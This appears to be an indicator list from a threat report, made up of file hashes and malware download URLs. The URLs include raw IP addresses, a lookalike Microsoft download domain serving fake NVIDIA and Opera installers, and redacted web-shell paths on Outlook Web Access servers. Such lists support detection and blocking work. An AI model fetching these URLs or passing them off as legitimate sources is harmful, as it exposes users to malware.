ab32d4ec424b7cd30c7ace1dad859df1a65aa50e
SHA1
ba9de479beb82fd97bbdfbc04ef22e08224724ba
SHA1
cee178da1fb05f99af7a3547093122893bd1eb46
SHA1
2fed891610b9a770e396ced4ef3b0b6c55177305
SHA-256
b212655aeb4700f247070ba5ca6d9c742793f108881d07e4d1cdc4ede175fcff
SHA-256
d740136b37f894d76a7d4dedbe1ae51ed680c964bcb61e7c4ffe7d0e8b20ea09
SHA-256
bd79027605c0856e7252ed84f1b4f934863b400081c449f9711446ed0bb969e6
SHA-256
4d24b359176389301c14a92607b5c26b8490c41e7e3a2abbc87510d1376f4a87
SHA-256
c136b1467d669a725478a6110ebaaab3cb88a3d389dfa688e06173c066b76fcf
SHA-256
076d3ec587fc14d1ff76d4ca792274d1e684e0f09018b33da04fb1d5947a7d26
URL
http://103.212.223.210:9900/nvidia.msi
URL
http://86.105.18.116/news/code
URL
http://86.105.18.116/news/opera\_browser.dll
URL
http://86.105.18.116/news/opera\_browser.exe
URL
http://86.105.18.116/news/opera\_browser.png
URL
URL
http://microsoftsoftwaredownload.com:8080/c103w-at.zip
URL
http://microsoftsoftwaredownload.com:8080/m103w.zip
URL
URL
http://<REDACTED_HOSTNAME>/owa/auth/ /zfwqn
URL
http://<REDACTED_HOSTNAME>/owa/auth/%20/zfwqn
参考链接
